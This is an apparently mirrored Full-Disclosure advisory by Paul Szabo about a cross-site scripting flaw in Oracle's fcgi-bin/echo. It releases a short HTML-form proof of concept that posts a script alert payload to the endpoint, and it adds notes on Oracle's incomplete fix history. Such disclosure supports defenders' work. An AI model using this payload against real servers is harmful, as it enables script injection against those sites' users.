Oracle fcgi-bin/echo Cross Site Scripting

2011.03.24
Credit: Paul Szabo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Long ago, I wrote about an XSS vulnerability in Oracle fcgi-bin/echo : http://lists.grok.org.uk/pipermail/full-disclosure/2010-October/076794.html http://www.securityfocus.com/archive/1/514181 The issue may now be fixed in the latest versions of Oracle web servers: http://www.integrigy.com/oracle-security-blog/archive/2010/10/10/fastcgi-fcgi-bin-echo So I now release the PoC for this vulnerability: <form action="http://server/fcgi-bin/echo" method=post enctype="multipart/form-data"> <input type=text name=xss size=50 value="<script>alert('XSS')</script>"><br> <input type=submit value="send"> </form> The "traditional" form of a similar vulnerability http://osvdb.org/700 is claimed to have been fixed long ago, maybe in http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html However that never was actually fixed by Oracle, but was fixed by browsers that %-encode the query. Another interesting reference: http://www.thisisahmed.com/tia/ohs/ohshardening.html Cheers, Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top